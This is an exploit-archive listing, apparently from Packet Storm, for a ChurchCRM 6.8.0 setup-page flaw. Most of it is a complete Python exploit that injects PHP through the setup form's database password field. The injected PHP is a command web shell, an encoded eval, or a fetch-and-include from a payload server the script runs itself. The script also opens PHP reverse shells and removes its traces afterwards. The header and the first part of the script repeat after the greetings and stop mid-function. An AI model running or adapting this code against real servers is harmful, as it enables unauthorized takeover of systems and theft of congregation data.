Description
ChurchCRM versions 6.8.0 and earlier expose the installation setup endpoint without proper access restrictions. If the setup process remains accessible after deployment, it may allow unauthorized users to interact with configuration parameters. This...
Basic Information
ID
PACKETSTORM:215793
Published
Feb 18, 2026 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : ChurchCRM ≤ 6.8.0 – Setup Page Security Misconfiguration |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://github.com/ChurchCRM/ |
=============================================================================================================================================
[+] Summary : ChurchCRM versions 6.8.0 and earlier expose the installation setup endpoint without proper access restrictions.
If the setup process remains accessible after deployment, it may allow unauthorized users to interact with configuration parameters.
This misconfiguration increases the risk of exploitation in unpatched or improperly secured installations.
Administrators are advised to disable or restrict access to the setup directory after installation and update to the latest secure version.
[+] POC :
#!/usr/bin/env python3
import argparse
import base64
import random
import string
import sys
import time
import logging
import re
import socket
import threading
import http.server
import socketserver
from urllib.parse import urljoin, urlparse, quote
from typing import Optional, Dict, Any, Tuple, List, Union
from dataclasses import dataclass, field
from enum import Enum
from functools import wraps
import json
import requests
from requests.exceptions import RequestException
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
VERSION = "2.0.0"
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
TIMEOUT = 30
MAX_RETRIES = 3
DEFAULT_PATHS = ['', '/churchcrm', '/crm', '/church', '/crmchurch']
class ExploitError(Exception):
"""Base exception for exploit errors"""
pass
class TargetUnreachableError(ExploitError):
"""Target is not reachable"""
pass
class InjectionFailedError(ExploitError):
"""Failed to inject payload"""
pass
class PayloadServerError(ExploitError):
"""Payload server error"""
pass
class VersionDetectionError(ExploitError):
"""Version detection error"""
pass
class TargetType(Enum):
"""Target platform types"""
LINUX_CMD_STAGER = "linux_cmd_stager"
PHP_MEMORY = "php_memory"
PHP_FETCH = "php_fetch"
class CheckCode(Enum):
"""Check result codes"""
SAFE = "safe"
VULNERABLE = "vulnerable"
UNKNOWN = "unknown"
UNREACHABLE = "unreachable"
@dataclass
class TargetInfo:
"""Target information"""
url: str
base_path: str
scheme: str
host: str
port: int
version: Optional[str] = None
vulnerable: Optional[bool] = None
detected_paths: List[str] = field(default_factory=list)
@dataclass
class ExploitResult:
"""Exploit result"""
success: bool
session: Optional[requests.Session] = None
message: str = ""
target: Optional[TargetInfo] = None
output: Optional[str] = None
class Version:
"""Advanced version handling"""
def __init__(self, version_string: str):
self.original = version_string
self.clean = self._clean_version(version_string)
self.parts = self._parse_parts(self.clean)
self.suffix = self._extract_suffix(version_string)
def _clean_version(self, version: str) -> str:
"""Clean version string"""
match = re.search(r'(\d+\.\d+(?:\.\d+)?)', version)
return match.group(1) if match else '0.0.0'
def _parse_parts(self, version: str) -> List[int]:
"""Parse version into integer parts"""
parts = []
for part in version.split('.'):
try:
parts.append(int(part))
except ValueError:
parts.append(0)
return parts
def _extract_suffix(self, version: str) -> str:
"""Extract suffix (e.g., -beta2, -RC1)"""
match = re.search(r'[-_]([a-zA-Z]+\d*)$', version)
return match.group(1) if match else ''
def __lt__(self, other: Union[str, 'Version']) -> bool:
"""Less than comparison"""
if isinstance(other, str):
other = Version(other)
for i in range(max(len(self.parts), len(other.parts))):
v1 = self.parts[i] if i < len(self.parts) else 0
v2 = other.parts[i] if i < len(other.parts) else 0
if v1 < v2:
return True
if v1 > v2:
return False
if self.suffix and not other.suffix:
return True # Has suffix is considered older
if not self.suffix and other.suffix:
return False
return False
def __le__(self, other: Union[str, 'Version']) -> bool:
"""Less than or equal"""
return self < other or self == other
def __eq__(self, other: Union[str, 'Version']) -> bool:
"""Equal comparison"""
if isinstance(other, str):
other = Version(other)
return self.parts == other.parts and self.suffix == other.suffix
def __str__(self) -> str:
return self.original
def __repr__(self) -> str:
return f"Version('{self.original}')"
def safe_urljoin(base: str, path: str) -> str:
"""
Safely join URL parts handling base paths correctly
Examples:
>>> safe_urljoin('http://example.com/churchcrm', '/setup/')
'http://example.com/churchcrm/setup/'
>>> safe_urljoin('http://example.com/churchcrm/', 'setup/')
'http://example.com/churchcrm/setup/'
"""
base = base.rstrip('/')
if path.startswith('/'):
parsed = urlparse(base)
base_without_path = f"{parsed.scheme}://{parsed.netloc}"
base_path = parsed.path.rstrip('/')
return f"{base_without_path}{base_path}{path}"
else:
return f"{base}/{path.lstrip('/')}"
def normalize_url(url: str) -> str:
"""Normalize URL by adding scheme if missing and removing trailing slash"""
if not url.startswith(('http://', 'https://')):
url = 'http://' + url
return url.rstrip('/')
def parse_target(url: str) -> TargetInfo:
"""Parse target URL and return TargetInfo"""
url = normalize_url(url)
parsed = urlparse(url)
return TargetInfo(
url=url,
base_path=parsed.path.rstrip('/') or '/',
scheme=parsed.scheme,
host=parsed.hostname,
port=parsed.port or (443 if parsed.scheme == 'https' else 80),
)
def discover_base_path(session: requests.Session, base_url: str,
paths: List[str] = None, logger: logging.Logger = None) -> Optional[str]:
"""
Discover the correct base path by trying common paths
"""
if paths is None:
paths = DEFAULT_PATHS
parsed = urlparse(base_url)
base = f"{parsed.scheme}://{parsed.netloc}"
for path in paths:
test_url = f"{base}{path}" if path else base
try:
setup_url = safe_urljoin(test_url, '/setup/')
if logger:
logger.debug(f"Trying path: {setup_url}")
response = session.get(setup_url, timeout=5, allow_redirects=False)
if response.status_code in [200, 301, 302]:
if logger:
logger.info(f"Found ChurchCRM at: {test_url}")
return test_url
except:
continue
return None
class ColoredFormatter(logging.Formatter):
"""Custom formatter with colors"""
COLORS = {
'DEBUG': '\033[36m',
'INFO': '\033[32m',
'WARNING': '\033[33m',
'ERROR': '\033[31m',
'CRITICAL': '\033[35m',
'RESET': '\033[0m'
}
def format(self, record):
levelname = record.levelname
if levelname in self.COLORS:
record.levelname = f"{self.COLORS[levelname]}{levelname}{self.COLORS['RESET']}"
return super().format(record)
def setup_logger(debug: bool = False) -> logging.Logger:
"""Setup logger with appropriate configuration"""
logger = logging.getLogger('churchcrm_exploit')
logger.setLevel(logging.DEBUG if debug else logging.INFO)
if not logger.handlers:
handler = logging.StreamHandler(sys.stdout)
formatter = ColoredFormatter(
'%(asctime)s [%(levelname)s] %(message)s',
datefmt='%H:%M:%S'
)
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
def create_session(retries: int = MAX_RETRIES) -> requests.Session:
"""Create requests session with retry logic"""
session = requests.Session()
retry_strategy = Retry(
total=retries,
backoff_factor=0.5,
status_forcelist=[500, 502, 503, 504],
allowed_methods=["HEAD", "GET", "OPTIONS", "POST"]
)
adapter = HTTPAdapter(max_retries=retry_strategy)
session.mount("http://", adapter)
session.mount("https://", adapter)
session.headers.update({
'User-Agent': USER_AGENT,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
})
return session
def random_string(length: int = 8) -> str:
"""Generate random string"""
return ''.join(random.choices(string.ascii_lowercase, k=length))
def random_int_string(min_len: int = 5, max_len: int = 10) -> str:
"""Generate random integer as string"""
length = random.randint(min_len, max_len)
return ''.join(random.choices(string.digits, k=length))
def random_url() -> str:
"""Generate random URL"""
return f"http://{random_string(8)}.com/"
class PayloadHandler(http.server.SimpleHTTPRequestHandler):
"""HTTP handler for serving payloads"""
payload = None
logger = None
request_count = 0
def do_GET(self):
"""Handle GET request"""
PayloadHandler.request_count += 1
if self.logger:
self.logger.debug(f"Payload request #{PayloadHandler.request_count} from {self.client_address[0]}")
if self.payload:
self.send_response(200)
self.send_header('Content-Type', 'application/x-httpd-php')
self.send_header('Content-Length', str(len(self.payload)))
self.send_header('Pragma', 'no-cache')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
self.end_headers()
self.wfile.write(self.payload.encode())
if self.logger:
self.logger.info(f"Served payload to {self.client_address[0]}")
else:
self.send_response(404)
self.end_headers()
def log_message(self, format, *args):
"""Override to use our logger"""
if self.logger and self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug(f"Payload server: {format % args}")
class PayloadServer:
"""HTTP server for serving payloads"""
def __init__(self, logger: logging.Logger, host: str = '0.0.0.0', port: int = 0):
self.logger = logger
self.host = host
self.port = port
self.server = None
self.thread = None
self.payload = None
def start(self, payload: str) -> str:
"""Start payload server and return URL"""
self.payload = payload
PayloadHandler.payload = payload
PayloadHandler.logger = self.logger
PayloadHandler.request_count = 0
self.server = socketserver.TCPServer((self.host, self.port), PayloadHandler, bind_and_activate=False)
self.server.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.server_bind()
self.server.server_activate()
self.port = self.server.server_address[1]
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.daemon = True
self.thread.start()
server_url = f"http://{self.get_local_ip()}:{self.port}/"
self.logger.info(f"Payload server started at {server_url}")
return server_url
def stop(self):
"""Stop payload server"""
if self.server:
self.server.shutdown()
self.server.server_close()
self.logger.debug(f"Payload server stopped (served {PayloadHandler.request_count} requests)")
def get_local_ip(self) -> str:
"""Get local IP address"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
ip = '127.0.0.1'
finally:
s.close()
return ip
def wait_for_requests(self, timeout: int = 10) -> bool:
"""Wait for at least one request"""
start = time.time()
while time.time() - start < timeout:
if PayloadHandler.request_count > 0:
return True
time.sleep(0.5)
return False
class VersionDetector:
"""Detect ChurchCRM version from response"""
def __init__(self, logger: logging.Logger):
self.logger = logger
self.patterns = [
(re.compile(r'CRM-VERSION:\s*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'header'),
(re.compile(r'<meta[^>]*name=["\']version["\'][^>]*content=["\']([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'meta'),
(re.compile(r'<meta[^>]*content=["\']([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)[^>]*name=["\']version', re.I), 'meta'),
(re.compile(r'<!--\s*ChurchCRM[^\d]*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'comment'),
(re.compile(r'ChurchCRM[^\d]*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'footer'),
(re.compile(r'window\.ChurchCRM\s*=\s*\{[^}]*version:\s*["\']([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'js'),
(re.compile(r'"softwareVersion"\s*:\s*"([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'json'),
(re.compile(r'ChurchCRM[\/\s-]*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'php'),
]
def detect(self, response: requests.Response) -> Optional[Version]:
"""Detect version from response"""
detected_versions = []
if 'CRM-VERSION' in response.headers:
version = self._clean_version(response.headers['CRM-VERSION'])
if version:
self.logger.debug(f"Version found in header: {version}")
detected_versions.append(('header', version))
if 'X-Powered-By' in response.headers:
match = re.search(r'ChurchCRM[\/\s-]*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)',
response.headers['X-Powered-By'], re.I)
if match:
version = self._clean_version(match.group(1))
if version:
self.logger.debug(f"Version found in X-Powered-By: {version}")
detected_versions.append(('x-powered', version))
for pattern, source in self.patterns:
matches = pattern.findall(response.text)
for match in matches:
if isinstance(match, tuple):
match = match[0]
version = self._clean_version(match)
if version:
self.logger.debug(f"Version found in {source}: {version}")
detected_versions.append((source, version))
if not detected_versions:
return None
version_counts = {}
for source, version in detected_versions:
version_str = str(version)
version_counts[version_str] = version_counts.get(version_str, 0) + 1
most_common = max(version_counts.items(), key=lambda x: x[1])
self.logger.debug(f"Most common version: {most_common[0]} (appears {most_common[1]} times)")
return Version(most_common[0])
def _clean_version(self, version: str) -> Optional[Version]:
"""Clean and validate version string"""
version = version.strip()
match = re.search(r'([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', version)
if match:
return Version(match.group(1))
return None
def is_vulnerable(self, version: Optional[Version]) -> Optional[bool]:
"""Check if version is vulnerable using enhanced comparison"""
if not version:
return None
try:
vulnerable = version <= '6.8.0'
self.logger.debug(f"Version {version} <= 6.8.0? {vulnerable}")
return vulnerable
except Exception as e:
self.logger.error(f"Version comparison error: {e}")
return None
class ChurchCRMExploit:
"""ChurchCRM RCE Exploit"""
def __init__(self, target_url: str, logger: logging.Logger,
target_type: TargetType = TargetType.LINUX_CMD_STAGER,
lhost: Optional[str] = None, lport: Optional[int] = None,
payload: Optional[str] = None, verify_ssl: bool = True,
proxy: Optional[str] = None, auto_discover: bool = True):
self.logger = logger
self.original_url = target_url
self.target_type = target_type
self.lhost = lhost
self.lport = lport
self.custom_payload = payload
self.verify_ssl = verify_ssl
self.proxy = proxy
self.auto_discover = auto_discover
self.session = create_session()
self.payload_server = None
self.version_detector = VersionDetector(logger)
self.backdoor_injected = False
if proxy:
self.session.proxies = {'http': proxy, 'https': proxy}
self.target = self._initialize_target(target_url)
def _initialize_target(self, target_url: str) -> TargetInfo:
"""Initialize target with optional path discovery"""
try:
info = parse_target(target_url)
test_url = safe_urljoin(info.url, '/setup/')
response = self.session.get(test_url, timeout=5, verify=self.verify_ssl, allow_redirects=False)
if response.status_code in [200, 301, 302]:
self.logger.info(f"Target URL working: {info.url}")
info.detected_paths.append(info.base_path)
return info
except:
pass
if self.auto_discover:
self.logger.info("Direct URL not working, attempting path discovery...")
discovered = discover_base_path(self.session, target_url, logger=self.logger)
if discovered:
info = parse_target(discovered)
info.detected_paths = DEFAULT_PATHS
self.logger.info(f"Discovered ChurchCRM at: {info.url}")
return info
return parse_target(target_url)
def check(self) -> Dict[str, Any]:
"""Check if target is vulnerable"""
self.logger.info(f"Checking target: {self.target.url}")
try:
url = safe_urljoin(self.target.url, '/setup/')
self.logger.debug(f"Accessing {url}")
response = self.session.get(
url,
timeout=TIMEOUT,
verify=self.verify_ssl,
allow_redirects=True
)
self.logger.debug(f"Response code: {response.status_code}")
if response.status_code not in [200, 301, 302]:
self.logger.warning(f"Unexpected response code: {response.status_code}")
return {
'code': CheckCode.UNREACHABLE,
'message': f'Setup page returned HTTP {response.status_code}'
}
version = self.version_detector.detect(response)
if version:
self.logger.info(f"Detected ChurchCRM version: {version}")
vulnerable = self.version_detector.is_vulnerable(version)
self.target.version = str(version)
self.target.vulnerable = vulnerable
if vulnerable:
self.logger.warning("Target appears VULNERABLE!")
return {
'code': CheckCode.VULNERABLE,
'version': str(version),
'message': f'Vulnerable version {version} detected'
}
else:
self.logger.info("Target appears NOT vulnerable")
return {
'code': CheckCode.SAFE,
'version': str(version),
'message': f'Version {version} is not vulnerable'
}
else:
self.logger.warning("Could not detect version")
return {
'code': CheckCode.UNKNOWN,
'message': 'Version unknown - setup page accessible'
}
except RequestException as e:
self.logger.error(f"Request failed: {e}")
return {
'code': CheckCode.UNREACHABLE,
'message': f'Target unreachable: {e}'
}
def build_payload(self) -> str:
"""Build payload based on target type"""
prefix = f"{random_string(3)}';"
if self.target_type == TargetType.PHP_MEMORY:
if self.custom_payload:
php_payload = self.custom_payload
else:
php_payload = self._generate_reverse_shell()
b64_payload = base64.b64encode(php_payload.encode()).decode()
return f"{prefix} eval(base64_decode(\"{b64_payload}\")); //"
elif self.target_type == TargetType.PHP_FETCH:
if not self.payload_server:
raise PayloadServerError("Payload server not started")
payload_name = f"/tmp/{random_string(8)}.php"
server_url = f"http://{self.lhost}:{self.payload_server.port}/"
return (f"{prefix} $f='{payload_name}'; "
f"file_put_contents($f, file_get_contents('{server_url}')); "
f"register_shutdown_function('unlink', $f); include($f); //")
else:
return f"{prefix} system($_GET['cmd']); //"
def _generate_reverse_shell(self) -> str:
"""Generate PHP reverse shell"""
if not self.lhost or not self.lport:
return "phpinfo();"
return f"""<?php
$lhost = '{self.lhost}';
$lport = {self.lport};
if (function_exists('fsockopen') && function_exists('proc_open')) {{
$sock = @fsockopen($lhost, $lport);
if ($sock) {{
$descriptors = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open((PHP_OS == 'WINNT' ? 'cmd' : '/bin/sh'), $descriptors, $pipes);
proc_close($process);
}}
}}
if (function_exists('socket_create') && function_exists('proc_open')) {{
$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($sock && @socket_connect($sock, $lhost, $lport)) {{
$descriptors = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open((PHP_OS == 'WINNT' ? 'cmd' : '/bin/sh'), $descriptors, $pipes);
proc_close($process);
}}
}}
?>"""
def inject_backdoor(self) -> bool:
"""Inject backdoor via setup page"""
self.logger.info("Injecting backdoor into Include/Config.php...")
payload = self.build_payload()
post_data = {
'DB_SERVER_NAME': random_string(8),
'DB_SERVER_PORT': '3306',
'DB_NAME': random_string(8),
'DB_USER': random_string(6),
'DB_PASSWORD': payload,
'ROOT_PATH': '/',
'URL': random_url()
}
self.logger.debug(f"POST data prepared (password field contains payload)")
try:
url = safe_urljoin(self.target.url, '/setup/')
self.logger.debug(f"Sending POST to {url}")
response = self.session.post(
url,
data=post_data,
timeout=TIMEOUT,
verify=self.verify_ssl,
allow_redirects=False
)
if response.status_code == 200:
self.logger.info("Backdoor injected successfully!")
self.backdoor_injected = True
return True
else:
self.logger.error(f"Injection failed with HTTP {response.status_code}")
return False
except RequestException as e:
self.logger.error(f"Injection request failed: {e}")
return False
def execute_command(self, cmd: str) -> Optional[str]:
"""Execute command on target"""
if not self.backdoor_injected:
self.logger.warning("Backdoor not injected yet. Attempting injection...")
if not self.inject_backdoor():
self.logger.error("Cannot execute command: backdoor injection failed")
return None
self.logger.info(f"Executing command: {cmd}")
try:
url = safe_urljoin(self.target.url, '/')
self.logger.debug(f"Command URL: {url}?cmd={quote(cmd)}")
response = self.session.get(
url,
params={'cmd': cmd},
timeout=TIMEOUT,
verify=self.verify_ssl
)
if response.status_code == 200:
output = response.text.strip()
if '<html' in output.lower():
body_match = re.search(r'<body[^>]*>(.*?)</body>', output, re.S | re.I)
if body_match:
output = body_match.group(1).strip()
output = re.sub(r'<[^>]+>', ' ', output)
output = re.sub(r'\s+', ' ', output).strip()
return output
else:
self.logger.error(f"Command execution failed with HTTP {response.status_code}")
return None
except RequestException as e:
self.logger.error(f"Command execution request failed: {e}")
return None
def cleanup(self) -> bool:
"""Clean up - remove backdoor"""
if not self.backdoor_injected:
self.logger.debug("No backdoor to clean up")
return True
self.logger.info("Cleaning up...")
commands = [
'rm -f Include/Config.php',
'rm Include/Config.php',
'rm -f churchcrm/Include/Config.php',
'del /f Include\\Config.php',
'php -r "unlink(\'Include/Config.php\');"',
'php -r "unlink(\'churchcrm/Include/Config.php\');"'
]
success = False
for cmd in commands:
result = self.execute_command(cmd)
if result is not None: # Command executed (even if file doesn't exist)
self.logger.debug(f"Cleanup command executed: {cmd}")
success = True
if success:
self.logger.info("Cleanup completed")
self.backdoor_injected = False
else:
self.logger.warning("Cleanup may have failed")
return success
def run_cmd_stager(self, cmd: str) -> Tuple[bool, Optional[str]]:
"""Run command stager"""
output = self.execute_command(cmd)
return (output is not None, output)
def run_php_memory(self) -> Tuple[bool, Optional[str]]:
"""Run PHP in-memory payload"""
self.logger.info("Executing PHP in-memory payload...")
try:
url = safe_urljoin(self.target.url, '/')
self.logger.debug(f"Triggering payload via GET to {url}")
response = self.session.get(url, timeout=TIMEOUT, verify=self.verify_ssl)
if response.status_code == 200:
self.logger.info("PHP payload executed successfully")
return (True, response.text[:500] + "..." if len(response.text) > 500 else response.text)
else:
self.logger.error(f"PHP execution failed with HTTP {response.status_code}")
return (False, None)
except RequestException as e:
self.logger.error(f"PHP execution request failed: {e}")
return (False, None)
def run_php_fetch(self) -> Tuple[bool, Optional[str]]:
"""Run PHP fetch payload"""
self.logger.info("Executing PHP fetch payload...")
self.payload_server = PayloadServer(self.logger, host='0.0.0.0')
if self.custom_payload:
payload = self.custom_payload
else:
payload = self._generate_reverse_shell()
try:
server_url = self.payload_server.start(payload)
self.logger.info(f"Serving payload from {server_url}")
time.sleep(2)
if self.inject_backdoor():
self.logger.info("Waiting for payload request...")
if self.payload_server.wait_for_requests(timeout=30):
self.logger.info("Payload was fetched by target")
time.sleep(5)
success = True
else:
self.logger.warning("No payload request received")
success = False
else:
success = False
return (success, None)
finally:
self.payload_server.stop()
def exploit(self) -> ExploitResult:
"""Main exploit method"""
self.logger.info(f"Starting exploit against {self.target.url}")
self.logger.info(f"Target type: {self.target_type.value}")
check_result = self.check()
if check_result['code'] == CheckCode.UNREACHABLE:
return ExploitResult(
success=False,
message=f"Target unreachable: {check_result['message']}"
)
if check_result['code'] == CheckCode.SAFE:
return ExploitResult(
success=False,
message=check_result['message']
)
if not self.inject_backdoor():
return ExploitResult(
success=False,
message="Failed to inject backdoor"
)
success = False
output = None
if self.target_type == TargetType.LINUX_CMD_STAGER:
if self.custom_payload:
success, output = self.run_cmd_stager(self.custom_payload)
else:
success, output = self.run_cmd_stager('id')
if success and output:
self.logger.info(f"Command output: {output.strip()}")
elif self.target_type == TargetType.PHP_MEMORY:
success, output = self.run_php_memory()
elif self.target_type == TargetType.PHP_FETCH:
success, output = self.run_php_fetch()
self.cleanup()
return ExploitResult(
success=success,
message="Exploit completed successfully" if success else "Exploit failed",
target=self.target,
output=output
)
def main():
"""Main entry point"""
parser = argparse.ArgumentParser(
description='ChurchCRM Unauthenticated RCE Exploit by indoushka',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# Check vulnerability
%(prog)s http://target.com/churchcrm --check
# Execute command
%(prog)s http://target.com --cmd "id"
# Reverse shell (Linux)
%(prog)s http://target.com --reverse 192.168.1.100 4444
# Reverse shell with PHP fetch method
%(prog)s http://target.com --type php-fetch --reverse 192.168.1.100 4444
# Custom PHP payload
%(prog)s http://target.com --payload "<?php phpinfo(); ?>"
# With proxy and debug
%(prog)s http://target.com --check --proxy http://127.0.0.1:8080 --debug
Exit codes:
0 - Not vulnerable / Success
1 - Error / Unknown
2 - Vulnerable
"""
)
parser.add_argument('target', help='Target URL (e.g., http://target.com/churchcrm)')
parser.add_argument('--check', action='store_true', help='Check if target is vulnerable')
parser.add_argument('--cmd', metavar='COMMAND', help='Execute command')
parser.add_argument('--reverse', nargs=2, metavar=('LHOST', 'LPORT'),
help='Reverse shell (LHOST LPORT)')
parser.add_argument('--payload', metavar='CODE', help='Custom PHP payload')
parser.add_argument('--payload-file', metavar='FILE', help='PHP payload file')
parser.add_argument('--type', choices=['linux', 'php-memory', 'php-fetch'],
default='linux', help='Target type (default: linux)')
parser.add_argument('--proxy', help='HTTP proxy (e.g., http://127.0.0.1:8080)')
parser.add_argument('--no-verify', action='store_true', help='Disable SSL verification')
parser.add_argument('--debug', action='store_true', help='Enable debug output')
parser.add_argument('--no-discover', action='store_true',
help='Disable automatic path discovery')
args = parser.parse_args()
logger = setup_logger(args.debug)
if not any([args.check, args.cmd, args.reverse, args.payload, args.payload_file]):
logger.error("No action specified. Use --help for usage.")
sys.exit(1)
target_type_map = {
'linux': TargetType.LINUX_CMD_STAGER,
'php-memory': TargetType.PHP_MEMORY,
'php-fetch': TargetType.PHP_FETCH
}
target_type = target_type_map[args.type]
payload = None
if args.payload:
payload = args.payload
elif args.payload_file:
try:
with open(args.payload_file, 'r') as f:
payload = f.read()
except Exception as e:
logger.error(f"Failed to read payload file: {e}")
sys.exit(1)
try:
exploit = ChurchCRMExploit(
target_url=args.target,
logger=logger,
target_type=target_type,
lhost=args.reverse[0] if args.reverse else None,
lport=int(args.reverse[1]) if args.reverse else None,
payload=payload,
verify_ssl=not args.no_verify,
proxy=args.proxy,
auto_discover=not args.no_discover
)
except Exception as e:
logger.error(f"Failed to initialize exploit: {e}")
if args.debug:
import traceback
traceback.print_exc()
sys.exit(1)
try:
if args.check:
result = exploit.check()
if result['code'] == CheckCode.VULNERABLE:
logger.warning(f"Target is VULNERABLE! Version: {result.get('version', 'unknown')}")
sys.exit(2)
elif result['code'] == CheckCode.SAFE:
logger.info("Target is NOT vulnerable")
sys.exit(0)
else:
logger.warning(f"Unknown status: {result['message']}")
sys.exit(1)
elif args.cmd:
logger.info(f"Executing command: {args.cmd}")
if exploit.target_type != TargetType.LINUX_CMD_STAGER:
logger.warning(f"Switching target type from {exploit.target_type.value} to linux_cmd_stager")
exploit.target_type = TargetType.LINUX_CMD_STAGER
result = exploit.exploit()
if result.success and result.output:
print("\n" + "="*60)
print("COMMAND OUTPUT:")
print("="*60)
print(result.output)
print("="*60)
elif result.success:
print("\nCommand executed successfully (no output)")
else:
logger.error(f"Command execution failed: {result.message}")
sys.exit(1)
elif args.reverse:
logger.info(f"Attempting reverse shell to {args.reverse[0]}:{args.reverse[1]}")
if args.type == 'php-fetch':
exploit.target_type = TargetType.PHP_FETCH
elif args.type == 'php-memory':
exploit.target_type = TargetType.PHP_MEMORY
else:
exploit.target_type = TargetType.LINUX_CMD_STAGER
result = exploit.exploit()
if result.success:
logger.info("Reverse shell payload sent. Check your listener!")
if result.output:
print(f"\nOutput: {result.output}")
else:
logger.error(f"Reverse shell failed: {result.message}")
sys.exit(1)
else:
result = exploit.exploit()
if result.success:
logger.info("Exploit completed successfully!")
if result.output:
print(f"\nOutput: {result.output}")
else:
logger.error(f"Exploit failed: {result.message}")
sys.exit(1)
except KeyboardInterrupt:
logger.info("Interrupted by user")
sys.exit(130)
except Exception as e:
logger.error(f"Unexpected error: {e}")
if args.debug:
import traceback
traceback.print_exc()
sys.exit(1)
if __name__ == '__main__':
main()
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================
| # Title : ChurchCRM ≤ 6.8.0 – Setup Page Security Misconfiguration |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://github.com/ChurchCRM/ |
=============================================================================================================================================
[+] Summary : ChurchCRM versions 6.8.0 and earlier expose the installation setup endpoint without proper access restrictions.
If the setup process remains accessible after deployment, it may allow unauthorized users to interact with configuration parameters.
This misconfiguration increases the risk of exploitation in unpatched or improperly secured installations.
Administrators are advised to disable or restrict access to the setup directory after installation and update to the latest secure version.
[+] POC :
#!/usr/bin/env python3
import argparse
import base64
import random
import string
import sys
import time
import logging
import re
import socket
import threading
import http.server
import socketserver
from urllib.parse import urljoin, urlparse, quote
from typing import Optional, Dict, Any, Tuple, List, Union
from dataclasses import dataclass, field
from enum import Enum
from functools import wraps
import json
import requests
from requests.exceptions import RequestException
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
VERSION = "2.0.0"
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
TIMEOUT = 30
MAX_RETRIES = 3
DEFAULT_PATHS = ['', '/churchcrm', '/crm', '/church', '/crmchurch']
class ExploitError(Exception):
"""Base exception for exploit errors"""
pass
class TargetUnreachableError(ExploitError):
"""Target is not reachable"""
pass
class InjectionFailedError(ExploitError):
"""Failed to inject payload"""
pass
class PayloadServerError(ExploitError):
"""Payload server error"""
pass
class VersionDetectionError(ExploitError):
"""Version detection error"""
pass
class TargetType(Enum):
"""Target platform types"""
LINUX_CMD_STAGER = "linux_cmd_stager"
PHP_MEMORY = "php_memory"
PHP_FETCH = "php_fetch"
class CheckCode(Enum):
"""Check result codes"""
SAFE = "safe"
VULNERABLE = "vulnerable"
UNKNOWN = "unknown"
UNREACHABLE = "unreachable"
@dataclass
class TargetInfo:
"""Target information"""
url: str
base_path: str
scheme: str
host: str
port: int
version: Optional[str] = None
vulnerable: Optional[bool] = None
detected_paths: List[str] = field(default_factory=list)
@dataclass
class ExploitResult:
"""Exploit result"""
success: bool
session: Optional[requests.Session] = None
message: str = ""
target: Optional[TargetInfo] = None
output: Optional[str] = None
class Version:
"""Advanced version handling"""
def __init__(self, version_string: str):
self.original = version_string
self.clean = self._clean_version(version_string)
self.parts = self._parse_parts(self.clean)
self.suffix = self._extract_suffix(version_string)
def _clean_version(self, version: str) -> str:
"""Clean version string"""
match = re.search(r'(\d+\.\d+(?:\.\d+)?)', version)
return match.group(1) if match else '0.0.0'
def _parse_parts(self, version: str) -> List[int]:
"""Parse version into integer parts"""
parts = []
for part in version.split('.'):
try:
parts.append(int(part))
except ValueError:
parts.append(0)
return parts
def _extract_suffix(self, version: str) -> str:
"""Extract suffix (e.g., -beta2, -RC1)"""
match = re.search(r'[-_]([a-zA-Z]+\d*)$', version)
return match.group(1) if match else ''
def __lt__(self, other: Union[str, 'Version']) -> bool:
"""Less than comparison"""
if isinstance(other, str):
other = Version(other)
for i in range(max(len(self.parts), len(other.parts))):
v1 = self.parts[i] if i < len(self.parts) else 0
v2 = other.parts[i] if i < len(other.parts) else 0
if v1 < v2:
return True
if v1 > v2:
return False
if self.suffix and not other.suffix:
return True # Has suffix is considered older
if not self.suffix and other.suffix:
return False
return False
def __le__(self, other: Union[str, 'Version']) -> bool:
"""Less than or equal"""
return self < other or self == other
def __eq__(self, other: Union[str, 'Version']) -> bool:
"""Equal comparison"""
if isinstance(other, str):
other = Version(other)
return self.parts == other.parts and self.suffix == other.suffix
def __str__(self) -> str:
return self.original
def __repr__(self) -> str:
return f"Version('{self.original}')"
def safe_urljoin(base: str, path: str) -> str:
"""
Safely join URL parts handling base paths correctly
